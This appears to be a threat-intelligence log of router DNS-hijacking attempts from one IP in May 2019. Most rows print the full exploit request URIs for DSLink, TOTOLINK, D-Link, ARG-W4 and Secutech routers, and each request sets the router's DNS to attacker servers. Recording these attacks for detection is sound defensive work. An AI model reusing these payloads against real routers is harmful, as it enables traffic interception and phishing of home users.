DNS hijacking exploit attempts detected from 34.97.223.23

1. Source IP Country User Agent Method URI Tag FirstSeen LastSeen count
2. 34.97.223.23 United States Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:54.0) Gecko/20100101 Firefox/54.0 GET / Web Scanner 2019-05-22T03:06:29Z 2019-05-22T03:06:51Z 6
3. 34.97.223.23 United States curl/7.52.1 GET /action?dns_status=1&dns_poll_timeout=2&id=57&dns_server_ip_1=195&dns_server_ip_2=128&dns_server_ip_3=126&dns_server_ip_4=165&priority=1&cmdadd=add DSLink 260E Router DNS Change Exploit 2019-05-22T03:06:29Z 2019-05-22T03:06:51Z 6
4. 34.97.223.23 United States curl/7.52.1 GET /boafrm/formbasetcpipsetup?dnsmode=dnsmanual&dns1=195.128.126.165&dns2=195.128.124.131&dns3=195.128.124.131&dnsrefresh=1 TOTOLINK Router DNS Change Exploit 2019-05-22T03:06:29Z 2019-05-22T03:06:51Z 6
5. 34.97.223.23 United States curl/7.52.1 GET /dnscfg.cgi?dnsPrimary=195.128.126.165&dnsSecondary=195.128.124.131&dnsDynamic=0&dnsRefresh=1 D-Link Router DNS Change Exploit 2019-05-22T03:06:29Z 2019-05-22T03:06:51Z 12
6. 34.97.223.23 United States curl/7.52.1 GET /form2dns.cgi?dnsmode=1&dns1=195.128.126.165&dns2=195.128.124.131&dns3=&submit.htm?dns.htm=send&save=apply ARG-W4 Router DNS Change Exploit 2019-05-22T03:06:28Z 2019-05-22T03:06:51Z 6
7. 34.97.223.23 United States curl/7.52.1 GET /wan_dns.asp?go=wan_dns.asp&reboottag=&dsen=1&dnsen=on&ds1=195.128.126.165&ds2=195.128.124.131 Secutech Router DNS Change Exploit 2019-05-22T03:06:29Z 2019-05-22T03:06:51Z 12